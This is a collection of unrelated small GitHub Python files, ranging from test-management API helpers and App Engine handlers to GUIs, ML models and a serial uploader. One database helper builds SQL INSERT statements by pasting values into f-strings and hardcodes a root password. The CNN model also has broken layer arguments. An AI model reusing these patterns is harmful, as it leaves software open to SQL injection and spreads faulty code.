'default' in dict_value:\n            return str(dict_value['default'])\n\n        # If none of the above conditions are met, raise an exception\n        raise ValueError(\"Could not retrieve the desired field value.\")\n\n\n    def get_test_set_property(self, test_set_obj, test_set_property, is_custom_fields):\n        \"\"\"\n        Retrieves a specified property from a test set object.\n\n        :param test_set_obj: The test set object from which the property is to be extracted.\n        :param test_set_property: The name of the property to retrieve.\n        :param is_custom_fields: Boolean indicating whether the property is within the custom fields.\n        :return: The value of the specified property. If the property is not found, logs an error message.\n\n        Raises:\n        Exception: If there's an issue retrieving the property, an error message is logged.\n        \"\"\"\n        try:\n            if is_custom_fields:\n                val = test_set_obj['attributes']['custom-fields'][test_set_property]\n            else:\n                val = test_set_obj['attributes'][test_set_property]\n            if not val:\n                self.log(f'Failed to get test set property: \"{test_set_property}\", is custom field: \"{str(is_custom_fields)}\"')\n            return val\n        except:\n            self.log('Failed to get test set property')\n\n\n    def get_list_of_tests_by_status(self, test_set_obj_dict):\n        \"\"\"\n        Fetches a list of tests based on their status and the Automation Run Only property of the associated test set.\n\n        :param test_set_obj_dict: Dictionary of test set objects with set IDs as keys.\n        :return: A list of test instances filtered by the Automation Run Only property of their associated test set.\n\n        Note:\n        The method utilizes pagination to fetch tests in batches.
Each batch (or page) consists of up to 100 test instances.\n The function will keep fetching additional pages until a page with fewer than 100 test instances is encountered.\n \"\"\"\n\n test_set_ids_list = list(test_set_obj_dict.keys())\n test_set_ids_list_str = ','.join(test_set_ids_list)\n tests_to_execute = []\n page = 1\n while True:\n url = self.INSTANCE_URI + \"&set-ids=\" + test_set_ids_list_str + \"&page[number]=\" + str(page)\n # For next iteration\n page = page + 1\n response = static_methods.wait_for_request_200('get', url, self.HEADERS, msg_on_retry=f'Bad response for get_list_of_tests_by_status; Going to retry')\n dct_sets = json.loads(response.text)\n if len(dct_sets[\"data\"]) > 0:\n for test_instance in dct_sets[\"data\"]:\n test_instance_atrr = test_instance['attributes']\n # If status is 'ALL', will add the test with any status\n test_set_automation_run_only = test_set_obj_dict[str(test_instance['attributes']['set-id'])]['attributes']['custom-fields'][self.PRACTITEST_AUTOMATION_RUN_ONLY].lower()\n if test_set_automation_run_only == 'all':\n tests_to_execute.append(test_instance)\n # Get only if the test matches to given status\n elif test_instance_atrr['run-status'].lower() == test_set_automation_run_only:\n tests_to_execute.append(test_instance)\n if len(dct_sets[\"data\"]) < 100:\n break #Every page is 100 items, no need to get next page\n return tests_to_execute\n\n def convert_test_set_obj_list_to_dict_set_id_as_key(self, test_sets_list):\n \"\"\"\n Converts a list of test set objects to a dictionary with set IDs as keys.\n :param test_sets_list: List of test sets objects.\n :return: A dictionary with test set IDs as keys and test set objects as values.\n \"\"\"\n test_set_obj_dict = {}\n for test_set in test_sets_list:\n test_set_obj_dict[test_set['id']] = test_set\n return test_set_obj_dict\n\n def get_all_testsets_under_filter_list(self, filter_id:str):\n \"\"\"\n Retrieves all test sets that fall under a given filter.\n :param filter_id: Filter ID\n :return: A list of test sets under the specified filters.\n \"\"\"\n filter_id_list = filter_id.split(',')\n return self.get_all_testsets_under_filter_id_list(filter_id_list)\n\n\n def get_all_testsets_under_filter_id_list(self, filter_id_list):\n \"\"\"\n Retrieves all test sets that fall under a given list of filters.\n :param filter_id_list: List of filter IDs.\n :return: A list of test sets under the specified filters.\n \"\"\"\n testsets_list_of_dict = []\n for filter_id in filter_id_list:\n testsets_list_of_dict = testsets_list_of_dict + self.get_all_testsets_under_specific_filter_id(filter_id)\n return testsets_list_of_dict\n\n def get_all_testsets_under_specific_filter_id(self, filter_id):\n \"\"\"Return all test sets under specific filter id\n :param filter_id: int ot string\n :return: dictionary\n Returns a dictionary containing all test sets associated with a specific filter ID.\n\n :param filter_id: ID of the filter, can be an integer or a string.\n :return: Dictionary containing test set data.\n \"\"\"\n\n url = self.SETS_URI + \"&filter-id=\" + str(filter_id)\n try:\n response = static_methods.wait_for_request_200('get', url, self.HEADERS,\n f'Bad response for get_all_testsets_under_specific_filter_id; Going to retry')\n except Exception as e:\n self.log(f\"Error occurred: {e}\")\n raise Exception\n return static_methods.get_dict_data_if_not_empty(json.loads(response.text))\n\n def get_count_of_test_sets_under_filter(self, filter_id):#TODO add case: return only filters where there something to execute\n 
\"\"\"\n Calculates the count of test sets under a given filter or list of filters.\n\n :param filter_id: Comma-separated string of filter IDs.\n :return: Total count of test sets under the provided filter(s).\n \"\"\"\n\n filter_id_list = filter_id.split(',')\n count = 0\n for filter_id in filter_id_list:\n count = count + static_methods.safe_len(self.get_all_testsets_under_specific_filter_id(filter_id))\n return count\n\n def is_to_trigger(self):\n \"\"\"\n Determines if there are any test sets under the specified filter ID.\n\n :return: True if there are test sets to be executed, otherwise False.\n \"\"\"\n test_set_count = self.get_count_of_test_sets_under_filter(self.PRACTITEST_TRIGGER_FILTER_ID_LIST)\n if test_set_count > 0:\n self.log(f\"{test_set_count} Testset/s found to execute\")\n return True\n else:\n return False\n\n def push_to_sqs(self, tests_to_execute, debug=True):\n \"\"\"\n Pushes test execution data to an SQS queue or, if in debug mode, writes the data to a JSON file.\n\n :param tests_to_execute: Dictionary containing details of tests to be executed.\n :param debug: Boolean indicating if the method is in debug mode. If True, data is written to a JSON file instead of SQS. Default is True.\n \"\"\"\n if debug:\n timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n filename = f'{timestamp}_to_execute.json'\n static_methods.write_dict_to_json_file(tests_to_execute, filename)\n self.log(f'JSON file: \"{filename}\" created')\n return\n self.log('Going to push to SQS')\n sqs_pusher = SQSPusher(access_key=self.AWS_ACCESS_KEY, secret_key=self.AWS_SECRET_KEY)\n sqs_pusher.push_to_queue()\n return","repo_name":"Sigalov/Automation-Hub","sub_path":"connector/static/core/base_practitest.py","file_name":"base_practitest.py","file_ext":"py","file_size_in_byte":19636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"72543866003","text":"#!/usr/bin/env python\r\n#\r\n# Copyright 2007 Google Inc.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\nimport cgi\r\nimport datetime\r\nimport os\r\nimport lib\r\n#import controller.sessions.SessionManager\r\n#from controller.appengine_utilities.sessions import Session\r\n#from controller.appengine_utilities.flash import Flash\r\n#from controller.appengine_utilities.cache import Cache\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp import util\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import datastore_errors\r\nfrom google.appengine.ext.webapp import template\r\nfrom lib import mkhandler\r\nimport string\r\nimport datetime\r\nfrom model.models import *\r\n\r\nclass AddQuestionHandler(mkhandler.MKGAEHandler):\r\n\t\r\n\tdef base_directory(self):\r\n\t\treturn os.path.dirname(__file__)\r\n\t\r\n\tdef get(self, second_argument):\r\n\t\tself.internal_get(second_argument)\r\n\t\r\n\tdef internal_get(self,trivia_code):\r\n\t\tvalues = 
{\r\n\t\t\t'range3' : range(3),\r\n\t\t\t'trivia_code' : trivia_code,\r\n\t\t}\r\n\t\tself.render('add_trivia_question',template_values=values)\r\n\t\t#self.base_auth()\r\n\t\t#self.get_internal()\r\n\t\t#user_logout = users.create_logout_url(\"/eventos/\")\r\n\t\t#self.response.out.write(\"Logout.\" %user_logout)\r\n\r\n\tdef post(self, second_argument):\r\n\t\tself.auth_check()\r\n\t\tself.internal_post(second_argument)\r\n\t\t\r\n\tdef internal_post(self,trivia_code):\r\n\t\r\n\t\ttrivia = MKTrivia.get_by_id(int(trivia_code))\r\n\t\t\r\n\t\tquestion = MKTriviaQuestion()\r\n\t\tquestion.question_text = self.request.get('question_text')\r\n\t\tquestion.general_feedback = self.request.get('feedback_text')\r\n\t\tquestion.phrase = self.request.get('phrase_text')\r\n\t\tquestion.trivia = trivia\r\n\t\tquestion.last_displayed = datetime.datetime.now()\r\n\t\tquestion.put()\r\n\t\tself.flash = 'Question added'\r\n\t\tfor i in range(3):\r\n\t\t\tpossible_answer = MKTriviaPossibleAnswer()\r\n\t\t\tpossible_answer.possible_answer_text = self.request.get('alternative'+str(i)+'_text')\r\n\t\t\tpossible_answer.feedback_text = self.request.get('feedback'+str(i)+'_text')\r\n\t\t\tpossible_answer.is_correct = self.request.get('correct_alternative'+str(i)) == \"True\"\r\n\t\t\tpossible_answer.question = question\r\n\t\t\tpossible_answer.put()\r\n\t\tvalues = { \r\n\t\t\t\t\t'flash' : self.flash,\r\n\t\t\t\t\t'trivia_code' : trivia_code\r\n\t\t\t\t}\r\n\t\tself.render('added_trivia_question',template_values=values)\r\nclass ListTriviaHandler(mkhandler.MKGAEHandler):\r\n\tdef base_directory(self):\r\n\t\treturn os.path.dirname(__file__)\r\n\t\t\r\n\tdef internal_get(self):\r\n\t\tquestions = MKTriviaQuestion.all()\r\n\t\t\r\n\t\tself.render('trivia_list', template_values={'questions':questions})\r\n\r\nclass AddTriviaHandler(mkhandler.MKGAEHandler):\r\n\t\r\n\tdef base_directory(self):\r\n\t\treturn os.path.dirname(__file__)\r\n\t\r\n\tdef internal_get(self):\r\n\t \r\n\t\tself.render('add_trivia')\r\n\t\t#self.base_auth()\r\n\t\t#self.get_internal()\r\n\t\t#user_logout = users.create_logout_url(\"/eventos/\")\r\n\t\t#self.response.out.write(\"Logout.\" %user_logout)\r\n\r\n\tdef internal_post(self):\r\n\t\t\r\n\t\ttrivia_name = self.request.get('trivia_name')\r\n\t\t\r\n\t\texisting_trivia = MKTrivia.all().filter('trivia_name = ',trivia_name).get()\r\n\t\t\r\n\t\tif existing_trivia:\r\n\t\t\tflash_message = 'The trivia already exists'\r\n\t\t\tvalues = { 'flash' : flash_message, 'flash_type' : 'error'}\r\n\t\t\tself.render('add_trivia',template_values=values)\r\n\t\t\treturn \r\n\t\t\r\n\t\ttrivia = MKTrivia()\r\n\t\ttrivia.trivia_name = trivia_name\r\n\t\ttrivia.default_general_feedback = self.request.get('default_general_feedback')\r\n\t\ttrivia.default_correct_feedback = self.request.get('default_correct_feedback')\r\n\t\ttrivia.default_wrong_feedback = self.request.get('default_wrong_feedback')\r\n\t\ttrivia.put()\r\n\t\tvalues = { \r\n\t\t\t\t'trivia_code' : str(trivia.key().id())\r\n\t\t\t\t}\r\n\t\tself.render('added_trivia',template_values=values)\r\n\t\t\r\n\r\n\r\ndef main():\r\n application = webapp.WSGIApplication([('/admin/trivia/(\\d*?)/addQuestion', AddQuestionHandler),\r\n\t\t\t\t\t\t\t\t\t\t('/admin/trivia/add',AddTriviaHandler),\r\n\t\t\t\t\t\t\t\t\t\t('/admin/trivia/listQuestions',ListTriviaHandler)\r\n\t\t\t\t\t\t\t\t\t\t],\r\n                                         debug=True)\r\n util.run_wsgi_app(application)\r\n\r\n\r\nif __name__ == '__main__':\r\n 
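# Run the WSGI app when this module is executed directly.\r\n 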
main()\r\n","repo_name":"lomefin/leonardoluartenet","sub_path":"modules/admin/trivia.py","file_name":"trivia.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"5757614781","text":"import tkinter as tk\r\n\r\n# Create the main window\r\nroot = tk.Tk()\r\n\r\n# Create a function to convert a string to binary\r\ndef to_binary(string):\r\n # Initialize an empty list to hold the binary values\r\n binary_values = []\r\n\r\n # Loop through each character in the string\r\n for char in string:\r\n # Convert the character to its ASCII value and convert that to binary\r\n binary_values.append(bin(ord(char)))\r\n\r\n # Join the binary values into a single string and return it\r\n return ' '.join(binary_values)\r\n\r\n# Create a text field to enter the plain text\r\ntext_field = tk.Entry(root)\r\ntext_field.pack()\r\n\r\n# Create a button that, when clicked, will convert the plain text to binary\r\nconvert_button = tk.Button(root, text=\"Convert to Binary\", command=lambda: print(to_binary(text_field.get())))\r\nconvert_button.pack()\r\n\r\n# Start the GUI event loop\r\nroot.mainloop()\r\n","repo_name":"jeffryhawchab/text_to_binary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"22624146124","text":"import torch.nn as nn\n\n\nclass CnnModel(nn.Module):\n def __init__(self, input_size: int | tuple[int], kernel_size: int | tuple[int], padding_size: int, stride: int):\n super(CnnModel, self).__init__()\n\n firstOuputSize = (input_size + 2 * padding_size -\n kernel_size) / stride + 1\n\n print(\"1st Layer output Size: {}\".format(\n firstOuputSize))\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=input_size, out_channels=firstOuputSize,\n kernel_size=kernel_size, padding=padding_size, stride=stride),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=1),\n )\n\n secondOutputSize = (firstOuputSize + 2 *\n padding_size - kernel_size) / stride + 1\n\n print(\"2nd Layer output Size: {}\".format(\n secondOutputSize))\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=firstOuputSize,\n out_channels=secondOutputSize, kernel_size=kernel_size, padding=padding_size, stride=stride),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=1),\n )\n\n self.fc = nn.Sequential(\n nn.Flatten(secondOutputSize),\n nn.Linear(secondOutputSize),\n nn.Softmax()\n )\n\n def forward(self, x):\n out = self.layer1(x)\n\n print(\"First Layer Convolution Output Size: {}\".format(out.size))\n\n out2 = self.layer2(out)\n\n print(\"Second Layer Convolution Output Size: {}\".format(out2.size))\n\n out3 = self.fc(out2)\n\n return out3\n","repo_name":"donghquinn/mojo-practice","sub_path":"python_modules/cnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"27504155828","text":"import pymysql\n\nconnection = pymysql.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"123456\",\n db=\"recipes_app\",\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor\n)\n\nif connection.open:\n print(\"the connection is opened\")\n\n\ndef insert_dairy_ingredients(ingredients):\n try:\n values = []\n for ingredient in ingredients:\n values.append(f'(\"{ingredient.lower()}\")')\n with connection.cursor() as cursor:\n query = f\"INSERT ignore into 
dairy_ingredients(name) values{','.join(values)};\"\n            cursor.execute(query)\n            connection.commit()\n    except Exception as e:\n        print(f\"DB Error: {e}\")\n\n\ndef insert_gluten_ingredients(ingredients):\n    try:\n        values = []\n        for ingredient in ingredients:\n            values.append(f'(\"{ingredient.lower()}\")')\n        with connection.cursor() as cursor:\n            query = f\"INSERT ignore into gluten_ingredients(name) values{','.join(values)};\"\n            cursor.execute(query)\n            connection.commit()\n    except Exception as e:\n        print(f\"DB Error: {e}\")\n\n\ndef get_dairy_ingredients():\n    try:\n        with connection.cursor() as cursor:\n            query = \"SELECT * FROM dairy_ingredients;\"\n            cursor.execute(query)\n            results = cursor.fetchall()\n            dairy_ingredients = []\n            for res in results:\n                dairy_ingredients.append(res[\"name\"])\n            return dairy_ingredients\n    except Exception as e:\n        print(f\"DB Error: {e}\")\n\n\ndef get_gluten_ingredients():\n    try:\n        with connection.cursor() as cursor:\n            query = \"SELECT * FROM gluten_ingredients;\"\n            cursor.execute(query)\n            results = cursor.fetchall()\n            gluten_ingredients = []\n            for res in results:\n                gluten_ingredients.append(res[\"name\"])\n            return gluten_ingredients\n    except Exception as e:\n        print(f\"DB Error: {e}\")\n","repo_name":"Adi-Shuker/recipe_app","sub_path":"db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
{"seq_id":"20619291818","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QCoreApplication\nfrom PyQt5.QtGui import QIcon\nimport sys\nimport qtawesome\nclass TopWidget(QtWidgets.QWidget):\n    def __init__(self):\n        super(TopWidget, self).__init__()\n\n        self.setObjectName(\"TopWidget\")\n        self.setStyleSheet('''\n            QWidget#TopWidget{\n                background:#40E0D0;\n                border-top-left-radius:10px;\n                border-top-right-radius:10px;\n                border-top:1px solid white;\n                border-right:1px solid darkGray;\n                border-left:1px solid white;\n\n            }\n        ''')\n        self.close_button = QtWidgets.QPushButton(self)\n        self.close_button.setGeometry(QtCore.QRect(900, 20, 25, 25))\n        self.close_button.setIcon(QIcon(\"icon//close.jpg\"))\n\n        self.close_button.setStyleSheet(\"\"\"\n            background:#ffffff;\n            border-radius:10px;\n        \"\"\")\n        self.sign_pic = QtWidgets.QLabel(self)\n        self.sign_pic.setGeometry(QtCore.QRect(15,15,30,30))\n        self.sign_pic.setPixmap(QtGui.QPixmap.fromImage(QtGui.QImage(\"icon//window.png\")))\n        self.sign_pic.setScaledContents(True)\ndef main():\n    app = QtWidgets.QApplication(sys.argv)\n    gui = TopWidget()\n    gui.show()\n    sys.exit(app.exec_())\nif __name__ == '__main__':\n    main()\n","repo_name":"chenwenxin1998/nuclearfinder","sub_path":"nuclearfinder/TopWidget.py","file_name":"TopWidget.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"}
{"seq_id":"14431616621","text":"import socket\n\nsock = socket.socket()\n\nsock.connect(('localhost', 5075))\nwhile True:\n    pnumber = input(\"type number (0 - 100):\")\n    sock.send(bytes(pnumber + \"\\n\", \"utf-8\"))\n    resp = sock.recv(8)\n    print(resp.decode(\"utf-8\"))\n    if resp.decode(\"utf-8\") == \"correct\":\n        sock.close()\n        exit(0)\n","repo_name":"TzeenchH/HighloadServices","sub_path":"Lab3/TCPClient.py","file_name":"TCPClient.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
{"seq_id":"71556018324","text":"from os import path\nfrom os.path import dirname, realpath, isfile\nfrom json import dump, load\n\n\nclass 
jsonManager():\n def __init__(self):\n self.path = dirname(realpath(__file__)) + \"/\"\n \n def create_json(self, file, dicionario):\n data = dicionario\n path_data_json = self.path + file\n\n if not isfile(path_data_json):\n with open(path_data_json, 'w') as f:\n dump(data, f, indent = 4, separators = (',', ':'))\n return True\n else:\n return False\n\n def update(self, file, dicionario):\n pass\n def read(self, file):\n self.arquivo = self.path + file\n print(self.arquivo)\n if isfile(self.arquivo):\n with open(self.path + file) as f:\n data = load(f)\n return data\n else:\n return False\n\n\"\"\"if __name__ == '__main__':\n jmaneger = jsonManager()\n dic = {\n \n }\n print(jmaneger.read(\"teste.json\"))\"\"\"\n","repo_name":"KaiqueAndeloci/projetoRPG","sub_path":"json_manager.py","file_name":"json_manager.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"28584855178","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Dropout, Flatten\nfrom keras.layers.recurrent import LSTM\n\n\nclass LSTMModel:\n def __init__(self, timesteps, hidden_neurons):\n self.timesteps = timesteps\n self.hidden_neurons = hidden_neurons\n self.input_dim = 3\n\n def build(self):\n print(\"Building model...\")\n model = Sequential()\n\n model.add(LSTM(self.hidden_neurons,\n batch_input_shape=(None, self.timesteps, self.input_dim),\n return_sequences=True))\n # model.add(Dropout(0.2))\n print(model.output_shape) # => (None, 10, 10)\n\n # model.add(LSTM(100, return_sequences=False))\n model.add(Flatten())\n print(model.output_shape) # => (None, 100)\n\n model.add(Dense(1))\n print(model.output_shape) # => (None, 1)\n\n model.add(Activation(\"linear\"))\n print(model.output_shape) # => (None, 1)\n\n # model.compile(loss=\"mape\", optimizer=\"rmsprop\")\n model.compile(loss='mse', optimizer='rmsprop')\n\n model.summary()\n\n return model\n","repo_name":"takp/stock-price-predictor","sub_path":"lstm_model.py","file_name":"lstm_model.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"30"} +{"seq_id":"36405860706","text":"import os\nimport django\nimport requests\nimport random\nfrom datetime import datetime, timedelta\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"bike_store.settings\")\ndjango.setup()\n\nfrom rent.models import Customer, Vehicle, RentalStation\n\nBASE_URL = 'http://127.0.0.1:8000/api/rental/'\n\n\ndef create_rentals():\n customer_ids = list(Customer.objects.values_list('id', flat=True))\n vehicle_ids = list(Vehicle.objects.values_list('id', flat=True))\n rental_station_ids = list(RentalStation.objects.values_list('id', flat=True))\n\n rental_data = {\n \"return_date\": \"2023-08-20\",\n }\n\n for _ in range(200):\n rental_date = datetime(2023, 4, 1) + timedelta(days=random.randint(0, 137))\n rental_data[\"rental_date\"] = rental_date.strftime('%Y-%m-%d')\n\n rental_data[\"customer\"] = random.choice(customer_ids)\n rental_data[\"vehicle\"] = random.choice(vehicle_ids)\n rental_data[\"rental_station\"] = random.choice(rental_station_ids)\n\n if random.choice([True, False]):\n rental_data[\"return_date\"] = (rental_date + timedelta(days=random.randint(1, 365))).strftime('%Y-%m-%d')\n\n response = requests.post(BASE_URL, json=rental_data)\n\n if response.status_code == 201:\n print(f\"Rental created for customer {rental_data['customer']}\")\n else:\n print(f\"Failed 
to create rental for customer {rental_data['customer']}: {response.content}\")\n\n\nif __name__ == \"__main__\":\n create_rentals()\n","repo_name":"ItayMoshel/DI","sub_path":"Week6/Day5/Exercises/bike_store/create_rentals.py","file_name":"create_rentals.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"74580519443","text":"class Solution:\n def sortedListToBST(self, head):\n return self.dfs(head, None)\n\n def dfs(self, head, tail):\n if head == tail:\n return None\n slow, fast = head, head\n while fast != tail and fast.next != tail:\n fast = fast.next.next\n slow = slow.next\n root = TreeNode(slow.val)\n root.left = self.dfs(head, slow)\n root.right = self.dfs(slow.next, tail)\n return root\n","repo_name":"huangyingw/submissions","sub_path":"109/109.convert-sorted-list-to-binary-search-tree.234339825.Accepted.leetcode.py","file_name":"109.convert-sorted-list-to-binary-search-tree.234339825.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"16035830327","text":"from merge.framework.spreadsheet.section import Section\nfrom merge.framework.spreadsheet.cell import Cell\nfrom merge.spreadsheet.reconciliar.header_group import HeaderGroup\nfrom merge.spreadsheet.reconciliar.column_group import ColumnGroup\nfrom merge.spreadsheet.reconciliar.style import stylesheet\n\n\nWIDTHS = [\n 10, 35, 10\n]\nALIGN = [\n 0, 1, 2\n]\nTITLES = [\n 'Data', 'Nome', 'Valor'\n]\n\n\nclass ClientsSection(Section):\n def __init__(self, parent_sheet, inputs, clients):\n super().__init__(parent_sheet, inputs, 'clients', [0, 0], [0, 0])\n\n self.clients = clients\n\n self.add_row()\n self.add_group(HeaderGroup(self, 'Dados a Reconciliar', 'header', 1, 3))\n\n self.add_row()\n\n client_columns = list(zip(*clients))\n\n for j, column in enumerate(client_columns):\n group = ColumnGroup(\n self,\n inputs,\n column,\n {\n 'title': TITLES[j],\n 'column_width': WIDTHS[j]\n }\n )\n\n for i, row in enumerate(column):\n group.add_row()\n\n cell = Cell(\n self,\n inputs,\n f'{column}-{i}',\n {\n 'text': row\n },\n set([\n 'entry',\n ['center', 'left', 'right'][ALIGN[j]]\n ]),\n WIDTHS[j],\n stylesheet\n )\n group.add_cell(cell)\n\n self.add_group(group)\n","repo_name":"williamroque/Mega-Digest","sub_path":"merge/merge/spreadsheet/reconciliar/clients_section.py","file_name":"clients_section.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72725459284","text":"import serial\nimport subprocess\nimport sys\nimport os\nimport time\nimport _thread\nlog = print\n\n\nclass Uploader(object):\n def __init__(self, ser, file):\n self.ser = ser\n self.file = file\n\n def load(self):\n s = serial.Serial(self.ser, baudrate=9600, timeout=1)\n # Set M2 baudrate to 19200\n s.write(b'1')\n time.sleep(0.1)\n s.write(b'1f800702\\n')\n time.sleep(0.1)\n s.write(b'1000\\n')\n time.sleep(0.2)\n\n # Set computer baudrate to 19200\n s.baudrate = 19200\n time.sleep(0.1)\n\n # Erase flash\n s.write(b'1')\n time.sleep(0.1)\n s.write(b'10300000\\n')\n time.sleep(0.1)\n s.write(b'1\\n')\n time.sleep(0.2)\n\n # Bootloader\n s.write(b'5')\n time.sleep(0.1)\n s.write(b'10000000\\n')\n time.sleep(0.2)\n with open(self.file, 'rb') as f:\n bin = f.read()\n s.write(bin)\n time.sleep(1)\n\n # Set baudrate to 9600\n s.write(b'1')\n 
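# Added note: this appears to mirror the 19200-baud sequence above: command '1' selects register 0x1f800702, then the '0' written below restores the default 9600 baud.\n        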
time.sleep(0.1)\n        s.write(b'1f800702\\n')\n        time.sleep(0.1)\n        s.write(b'0\\n')\n        time.sleep(0.3)\n\n        s.baudrate = 9600\n        time.sleep(0.3)\n\n        print('Upload completed.')\n\n\ndef main():\n    if len(sys.argv) > 2:  # both the port and the binary file path are required\n        uploader = Uploader(ser=sys.argv[1],file=sys.argv[2])\n        uploader.load()\n    else:\n        print(\"Usage: uploader [port] [bin_file_path]\\n\")\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"daizhirui/CamelLibrary","sub_path":"ToolChains/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"}
{"seq_id":"21203384885","text":"import repertoire_action as action\nfrom terminaltables import AsciiTable\n\ndef afficher_tableau(repertoire):\n    tableau = [[\"name\", \"number\", \"address\"]]\n    liste_contacts = action.lister_contacts(repertoire)\n    for contacts in liste_contacts:\n        tableau.append([contacts[\"nom\"], contacts[\"telephone\"], contacts[\"adresse\"]])\n    print(AsciiTable(tableau).table)\n\n\ndef afficher_tout_les_contacts(repertoire):\n    afficher_tableau(repertoire)\n\n\ndef supprimer_personne():\n    name = input(\"\\nWhich contact do you want to delete? \")\n    if action.supprimer_personne(repertoire, name):\n        print(\"The contact has been deleted\")\n        afficher_tout_les_contacts(repertoire)\n    else:\n        print(\"Try again\")\n\n\ndef ajouter_personne():\n    nom = input(\"\\nWhat is the contact's name? \")\n    telephone = input(\"What is the number? \")\n    adresse = input(\"What is the address? \")\n    added = action.ajouter_personne(repertoire, nom, telephone, adresse)\n    if added:\n        print(\"\\nThe contact has been added\")\n        afficher_tout_les_contacts(repertoire)\n    else:\n        print(\"The contact already exists\")\n\ndef afficher_recherche(resultats_recherche):\n    print(resultats_recherche)\n\n\ndef rechercher_personne():\n    recherche = input(\"\\nPlease enter the contact's name: \")\n    resultats_recherche = action.recherche_personnes(repertoire, recherche)\n    if resultats_recherche:\n        afficher_recherche(resultats_recherche)\n    else:\n        print(\"No contact with that name\")\n\n\nwhile True:\n    repertoire = action.get_rep()\n    choix_utilisateur = input(\"\\nPress L to list, A to add, S to delete a contact, R to search, or Q to quit: \").upper()\n\n    if choix_utilisateur == \"L\":\n        print(\"\\nHere are the contacts\")\n        afficher_tout_les_contacts(repertoire)\n\n    elif choix_utilisateur == \"S\":\n        supprimer_personne()\n\n    elif choix_utilisateur == \"A\":\n        ajouter_personne()\n\n    elif choix_utilisateur == \"R\":\n        rechercher_personne()\n\n    elif choix_utilisateur == \"Q\":\n        break","repo_name":"legerM/repertoire","sub_path":"repertoire_ui.py","file_name":"repertoire_ui.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"}
{"seq_id":"18934052473","text":"\"\"\"General monte carlo simulation helper.\"\"\"\n\nimport os\nfrom time import time\nimport multiprocessing\nfrom collections import OrderedDict\n\nfrom pathos.multiprocessing import ProcessPool\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom mpmath import mpf\n\nglobal_fn_multi = None\nglobal_var_multi = None\n\n\ndef multiprocessing_func(fn_to_eval, random_var_gen, i):\n    \"\"\"Allows monte carlo to run on multiple CPUs.\"\"\"\n    random_vars = random_var_gen(i)\n    result = fn_to_eval(*random_vars)\n    return result\n\n\ndef monte_carlo(\n    fn_to_eval,\n    random_var_gen,\n    
num_simulations,\n num_cpus=1,\n save_every=1,\n save_name=\"monte_carlo_result.csv\",\n headers=None,\n progress=True,\n):\n \"\"\"\n Full monte carlo simulation loop.\n\n Evaluate fn_to_eval over num_simulations iterations, with\n *random_var_gen(i) passed into fn_to_eval at each iteration i.\n\n \"\"\"\n all_stats = []\n global_fn_multi = fn_to_eval\n global_var_multi = random_var_gen\n save_every = int(save_every * num_simulations)\n\n # temp = [random_var_gen() for _ in range(num_simulations)]\n # random_vars = [[] for _ in temp[0]]\n # for val in temp:\n # for i, item in enumerate(val):\n # random_vars[i].append(item)\n\n pbar = tqdm(range(num_simulations), disable=not progress)\n if num_cpus > 1:\n # pool = multiprocessing.get_context(\"spawn\").Pool(num_cpus)\n pool = ProcessPool(nodes=num_cpus)\n print(\n \"Launching {} workers for {} iterations\".format(num_cpus, num_simulations)\n )\n pbar.set_description(\"Monte carlo loop\")\n for i in pbar:\n result = pool.apipe(\n multiprocessing_func, global_fn_multi, global_var_multi, 